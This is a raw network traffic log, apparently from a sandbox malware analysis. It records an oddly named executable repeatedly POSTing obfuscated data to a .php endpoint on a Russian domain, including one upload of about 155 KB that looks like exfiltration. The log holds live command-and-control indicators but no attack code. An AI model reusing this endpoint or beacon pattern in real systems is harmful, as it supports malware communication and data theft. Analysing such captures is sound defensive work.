                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.449741172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:28.627285957 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:28.983504057 CET1072OUTData Raw: 54 50 5e 57 56 40 59 5f 5d 56 5b 57 54 54 51 5a 58 50 58 5c 5b 50 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^WV@Y_]V[WTTQZXPX\[PWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'?_ ! -+^0.8Z54+U!&'$0Z>&2+4%:!^&%X*
                                                                                                                                Jan 1, 2025 21:47:29.090163946 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:29.394495010 CET815INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=245b%2FSgSd3wvXtSrKdqDZHGSg29AbcnRulU5ts%2FYYd6H5TMx4K0FrJ6P86v%2Fepb3V5%2BfPaJpxs0pg%2FA%2Fr08oQVEW%2BePJzP2W6gNI0eNYvlCDM65tUSGdrCSOeu8Jts7IaOk%2FB8q2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d5e78d24368-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3114&min_rtt=1995&rtt_var=2987&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=133296&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.449742172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:29.620697021 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:29.967943907 CET1072OUTData Raw: 51 56 5e 55 56 40 59 55 5d 56 5b 57 54 55 51 52 58 5d 58 50 5b 5e 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV^UV@YU]V[WTUQRX]XP[^WDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$!/#11"3 [!?$"C430.\>6(?2:!^&%X*
                                                                                                                                Jan 1, 2025 21:47:30.068409920 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:30.343569994 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cL0kBdXvTwnPtyLy%2FeeyihReHqR0wCmKUkgesvJLTy29IOpjr3Tyx1uKPU%2BYEyu4z1IULYIHhabrGQNQcdEcigtb8dk0aTrq8yCWvWa8qrXfxOzK5Rt9lA1FwT27Il8viB%2F6U4C5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d649de67c90-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3859&min_rtt=1814&rtt_var=4771&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=80312&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.449744172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:30.557286024 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:30.905539989 CET1072OUTData Raw: 54 54 5e 50 53 40 59 57 5d 56 5b 57 54 5b 51 5c 58 51 58 5f 5b 5f 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT^PS@YW]V[WT[Q\XQX_[_WGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X&2#T%Y"[35R($Q!&(0 *]=6>>=8Y'*!^&%X*
                                                                                                                                Jan 1, 2025 21:47:31.004554987 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:31.216694117 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:31.283631086 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ildLEUPk%2B3YBtcp%2FG%2B%2BFUae5CumsFG5TkZbjEdK8HdcO1fHp174QJnLSUgGhaYaB8iXP2vKgLA21jtc%2FLZ2zi%2BETlLRPeplTelI0AOaROO7BCyLULViHSwd4KlFhzX9wr5NYjAkD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d6a7c5143ed-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3717&min_rtt=1560&rtt_var=4899&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=77585&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.449745172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:31.429449081 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:31.780545950 CET1072OUTData Raw: 51 55 5b 52 56 47 59 56 5d 56 5b 57 54 5f 51 58 58 50 58 59 5b 5e 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[RVGYV]V[WT_QXXPXY[^WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0,7* >7%=Z5;*786%8T$3.])6)<$^2*!^&%X*+
                                                                                                                                Jan 1, 2025 21:47:31.873199940 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:32.131284952 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0jcC7MlBcdWtUaPdM2ldYHnsUwwgXTtDqrOh9bUbrObhPFk%2FhjuY%2BCkf6f9eOXCUUymUIhzJ7nSYdJNJudzYMNbkNFGUa1VcL%2BTkgY33qdb81SHyiiSCo9TLrxaNbh9z2beTA5L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d6fe8c5422d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=10367&min_rtt=1670&rtt_var=18021&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=20490&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:47:32.218118906 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.449746172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:31.658973932 CET347OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 155636
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:32.031936884 CET12360OUTData Raw: 51 55 5b 50 56 43 59 52 5d 56 5b 57 54 5a 51 5b 58 5d 58 58 5b 52 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[PVCYR]V[WTZQ[X]XX[RWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'2 #!%Y"7]0-3";;W($";$X(6B<4%!^&%X*?
                                                                                                                                Jan 1, 2025 21:47:32.038037062 CET4944OUTData Raw: 20 5c 1c 3d 0a 34 26 33 24 2b 5e 36 33 11 12 59 04 55 38 56 39 2b 25 56 0b 5d 06 54 34 23 21 26 03 2f 05 26 0b 0e 15 59 0f 24 32 54 09 5f 38 2a 0a 38 03 5a 04 03 01 15 3f 32 5f 17 32 5a 2d 31 0e 2d 5f 17 07 59 35 3d 08 58 3a 03 3e 20 0d 19 09 38
                                                                                                                                Data Ascii: \=4&3$+^63YU8V9+%V]T4#!&/&Y$2T_8*8Z?2_2Z-1-_Y5=X:> 86>#[<S&WTX)>PR(:1928 %: -!+:_4(B#&;V+1@Z@".&<9><;^5<S>^=&B( (68TY?4":V3(_+<&0Z:'!>23!-*)]&>
                                                                                                                                Jan 1, 2025 21:47:32.038058043 CET7416OUTData Raw: 39 2b 08 5c 22 3c 19 12 3f 22 0b 5c 28 04 0b 11 3d 2a 3f 10 01 09 32 24 3a 3f 2a 1e 0b 55 3e 21 22 55 3e 1e 3b 23 20 07 39 22 3a 06 24 58 3f 5f 0b 05 23 59 23 39 20 16 37 35 1a 12 3b 37 06 53 0b 56 13 10 03 35 22 27 3f 2f 09 06 09 3d 00 02 3f 3f
                                                                                                                                Data Ascii: 9+\"<?"\(=*?2$:?*U>!"U>;# 9":$X?_#Y#9 75;7SV5"'?/=??5.8T96,<4<[->00#'>T*?6(V!>.Q(,8&&!"6]_?=U$//#3(.",*+\9P@[8$-22"+)7Y"";5$;T;^)V).+4#_Q?>=:W4.X5<;2$1'"$]V9^;VZ#WW_P&1,<
                                                                                                                                Jan 1, 2025 21:47:32.039227009 CET9888OUTData Raw: 3b 05 26 06 29 33 3f 59 3f 5e 55 04 0e 5b 05 32 08 30 1b 58 02 3c 00 54 39 05 34 37 07 57 32 3a 39 1e 51 3c 0a 1c 00 2c 35 0c 25 5f 08 55 28 3a 3b 32 32 01 22 10 3c 18 3c 3c 55 13 21 28 3b 1e 2b 42 16 3d 0e 0b 05 32 27 3c 35 20 35 36 14 1f 10 2c
                                                                                                                                Data Ascii: ;&)3?Y?^U[20X<T947W2:9Q<,5%_U(:;22"<<<U!(;+B=2'<5 56,<[=]<>9;"/$+=&=*<0?9Y('40*?#%W>=_8TQY?9R.?=&P47:4;^_=Q=#[-2V+19499>$'?Y0[8_)':'21V%01/#4( $*-](Y36"'
                                                                                                                                Jan 1, 2025 21:47:32.042673111 CET2472OUTData Raw: 04 2a 36 3e 08 5c 30 2d 0f 04 1b 53 29 32 27 3f 3d 02 1f 5f 05 0d 27 51 21 29 18 10 31 24 03 15 0a 26 0b 2b 05 5b 02 1e 02 22 2c 15 3d 05 0b 53 39 2b 16 1e 02 09 3d 3d 3d 2c 05 2d 25 54 05 3e 39 1c 10 29 3e 03 3c 56 38 5d 3e 59 04 10 2b 50 0d 33
                                                                                                                                Data Ascii: *6>\0-S)2'?=_'Q!)1$&+[",=S9+===,-%T>9)><V8]>Y+P3 .1X*Y01<<3-Q%7/66("!+%")<!6;+,<W #><T\WQ7306$$XY<W37'$=2%A9E?,8&/> X!3+ 1_8U=1=^:<^632?(@)5^8/^922"+<#X;
                                                                                                                                Jan 1, 2025 21:47:32.042934895 CET4944OUTData Raw: 3b 0e 26 1b 02 35 26 27 22 04 3f 2f 3a 5b 22 2e 0f 2e 39 2e 0d 05 28 19 01 06 57 25 33 3e 0c 23 01 3f 56 43 29 3e 33 00 2c 55 10 0d 32 2a 28 2c 0c 30 3d 56 30 06 2c 1d 31 55 31 31 3e 32 00 09 31 28 20 18 30 2d 23 2a 31 04 2b 2c 3d 3b 5d 12 22 23
                                                                                                                                Data Ascii: ;&5&'"?/:["..9.(W%3>#?VC)>3,U2*(,0=V0,1U11>21( 0-#*1+,=;]"#;:(UX16"\&(<)3# 8#:(1,^+>(3%,61#U19'\?/4WX)?:$7>>5W<$($;9-,4'/2/)9:Z.9=0>?21W3?98X+0>=Y<=)1\33&?:#8U3T0%>;
                                                                                                                                Jan 1, 2025 21:47:32.042990923 CET9888OUTData Raw: 14 0c 33 58 32 32 01 1c 33 51 1b 1c 24 2a 56 59 3c 27 32 56 36 33 11 5f 3b 06 13 1d 02 22 1d 11 0f 07 14 5d 25 28 0b 57 0b 03 52 0a 31 01 12 2e 02 0a 1a 3f 3a 36 25 1e 33 01 27 0c 05 54 04 10 32 5a 58 5a 0d 20 23 33 0e 29 21 55 0a 15 0a 2a 0c 3b
                                                                                                                                Data Ascii: 3X223Q$*VY<'2V63_;"]%(WR1.?:6%3'T2ZXZ #3)!U*;9<Z499W$1 53> (2=6P2 \ 8\/.<6!?(6 5Q>U%15:3.$2 Q%9W>3:,0%5"S !><+:1"^[^>,4_9[_.<,01/?_*T.$! .*$*48/>TZ2C4
                                                                                                                                Jan 1, 2025 21:47:32.043353081 CET9888OUTData Raw: 0b 04 30 59 38 01 1e 17 30 34 38 56 3f 1d 09 10 0b 3c 07 08 3e 42 26 23 13 00 19 07 3f 3f 18 26 39 59 1b 26 38 2c 27 21 2e 00 57 04 2d 11 2e 1f 2f 12 3a 0b 28 3f 5c 5a 32 32 0c 54 32 35 3c 14 0b 32 00 51 04 16 38 27 0a 30 52 2e 0d 20 55 37 30 3b
                                                                                                                                Data Ascii: 0Y8048V?<>B&#??&9Y&8,'!.W-./:(?\Z22T25<2Q8'0R. U70;"(?7>'#'*";"(Z+ .%>+;$'8%1U7<,U;Q#\&=?9=S3__#21''(S4W-=X?6%T?9;8]4;#'>X2(..9><>_1$8&Z/U_+);^>6!V"5:Y!":
                                                                                                                                Jan 1, 2025 21:47:32.044075966 CET7416OUTData Raw: 2a 5a 59 59 3f 26 55 1c 35 1f 3a 15 24 29 20 20 3c 14 03 27 2d 5a 42 1b 36 1d 30 53 3c 3d 5e 1a 32 5b 34 19 36 58 07 1c 0a 3f 59 1a 31 55 2c 58 09 03 18 37 0e 03 33 33 3b 0d 2e 38 2b 2e 22 19 09 04 0e 2d 31 3f 14 57 21 57 5c 57 0d 20 2d 5c 3e 32
                                                                                                                                Data Ascii: *ZYY?&U5:$) <'-ZB60S<=^2[46X?Y1U,X733;.8+."-1?W!W\W -\>2YX8U:Y?W**:)4?5GS6")!*6(??9#%,5?Y4Y.(Z953<+%2U>07,8#],]2V)&3B64$ 7/200"^6 3P8>2?/5&^?4X&*?(</!9.^:*??]6)$_W(\>
                                                                                                                                Jan 1, 2025 21:47:32.044106960 CET7416OUTData Raw: 0e 37 1e 1e 05 54 1b 38 33 58 20 1d 0d 08 37 12 36 1f 00 0e 25 5e 3c 25 0a 5d 2e 1e 3c 2c 02 2c 20 56 3f 10 3e 58 2d 3a 24 32 20 19 2f 13 35 2a 38 58 32 2c 2a 55 11 12 22 39 26 17 3b 3e 23 0d 0c 20 18 03 02 59 2e 19 25 05 28 52 00 09 0c 27 38 21
                                                                                                                                Data Ascii: 7T83X 76%^<%].<,, V?>X-:$2 /5*8X2,*U"9&;># Y.%(R'8!. &*#:3T^: :Z <4'$,8> 6A'.;22\A =Z?&>XY,)8+;7YR3#=6 !%5?3Z22<0<W:)=::)$2*;68?9-<+=!;=S*&.Z&^&#4_:=)2VU7:6*?8)T>>
                                                                                                                                Jan 1, 2025 21:47:32.112818003 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:33.294301033 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wm0kaSzluewWWz7JtC8%2FIHLJC7wdlzvvzWAIxw8ndd73nREUqfSl4%2F6AKfiV1f1hb7KvshMj%2B9L2Ho7nVqKMztg3ihvS329cWN09rRB8SjBa9kU5ug096qASA1EWYl0ltNwsREvZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d716e3c7cb2-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3694&min_rtt=1783&rtt_var=4491&sent=56&recv=162&lost=0&retrans=0&sent_bytes=25&recv_bytes=155983&delivery_rate=85520&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.449747172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:32.375997066 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:32.735125065 CET1072OUTData Raw: 54 53 5b 52 53 43 59 54 5d 56 5b 57 54 5b 51 59 58 54 58 5a 5b 56 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[RSCYT]V[WT[QYXTXZ[VWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0Y"2-"X;'=#";++4!5 R0.)6=E+_&!^&%X*
                                                                                                                                Jan 1, 2025 21:47:32.850366116 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:33.187572956 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fJgPNDPUQVo8vsAsYPqTZTIlo7llq4RGGW95qcnNVq73r8JqFBuLlAEMwxGdtMhqEMQo5yiHKqswFIHKiP3WfqQqsUQj3INMCBQ0gSpk3mHw2%2F92gNHc9TWfOOb9w%2BEJE0%2Bz0JWU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d75fda572b7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8014&min_rtt=1840&rtt_var=13038&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=28497&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.449749172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:33.409024000 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:33.764704943 CET1072OUTData Raw: 51 56 5b 50 53 46 59 5e 5d 56 5b 57 54 58 51 59 58 5c 58 59 5b 56 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[PSFY^]V[WTXQYX\XY[VWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[![$;#"!>?$.0Y#;<*$;5 U0 :(56([1:!^&%X*7
                                                                                                                                Jan 1, 2025 21:47:33.863409996 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:34.236210108 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
